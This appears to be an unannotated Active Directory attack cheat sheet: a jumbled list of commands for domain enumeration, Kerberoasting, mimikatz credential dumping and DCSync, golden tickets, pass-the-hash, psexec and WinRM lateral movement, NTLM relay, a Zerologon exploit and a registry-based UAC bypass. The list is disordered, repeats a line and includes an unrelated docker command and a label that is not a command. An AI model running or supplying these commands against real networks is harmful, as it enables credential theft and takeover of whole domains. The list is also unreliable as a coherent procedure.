Get-ObjectAcl -Identity user
Get-ObjectAcl -Identity user
net users /domain
crackmapexec smb target -u users.txt -p 'Pass!' --continue-on-success
python3 username-generate.py -u names.txt -o generated_users.txt
PowerShell reflection trick
impacket-GetNPUsers domain/ -dc-ip target -usersfile users.txt
docker-compose up -d
net group "Domain Admins" /domain
certipy-ad find -u user -p pass -dc-ip target -vulnerable
crackmapexec smb target -u user -p pass --rid-brute
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
lsadump::dcsync /user:domain\user
net accounts
Find-DomainShare -CheckShareAccess
gpp-decrypt 'cpassword'
kerberos::golden /user:user /domain:domain /sid:SID /krbtgt:hash /ptt
netexec smb target -u users.txt -H hashes.txt --continue-on-success
. .\HostRecon.ps1; Invoke-HostRecon
impacket-GetUserSPNs -request domain/user:pass -dc-ip target
kerbrute userenum -d domain --dc target wordlist
sekurlsa::logonpasswords
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
netexec smb target -u user -p pass --sam
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:powershell
impacket-psexec -hashes :NTHASH user@target
kerberos::ptt ticket.kirbi
Invoke-UserHunter
Import-Module .\PowerView.ps1
PsExec64.exe \\target -u domain\user -p pass cmd
responder -I eth0 -wpad -v
.\Rubeus.exe kerberoast /outfile:hashes.txt
proxychains python3 scshell.py user@target
impacket-lookupsid anonymous@target
msfconsole use exploit/windows/smb/smb_relay
Get-NetUser -SPN
reg save hklm\sam c:\Temp\sam
Invoke-BloodHound -CollectionMethod All
kerberos::golden /sid:SID /domain:domain /target:host /service:svc /rc4:hash /user:user /ptt
.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin user
winrs -r:host -u:user -p:pass cmd
python3 cve-2020-1472-exploit.py 'DC$' DC-IP
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<encoded payload>"
.\GMSAPasswordReader.exe --AccountName svc_apache
impacket-secretsdump -just-dc-ntlm domain/user@target
ldapsearch -x -H ldap://target -D 'user' -w 'pass' -b 'DC=domain,DC=local'
python3 windapsearch.py --dc-ip target -U --full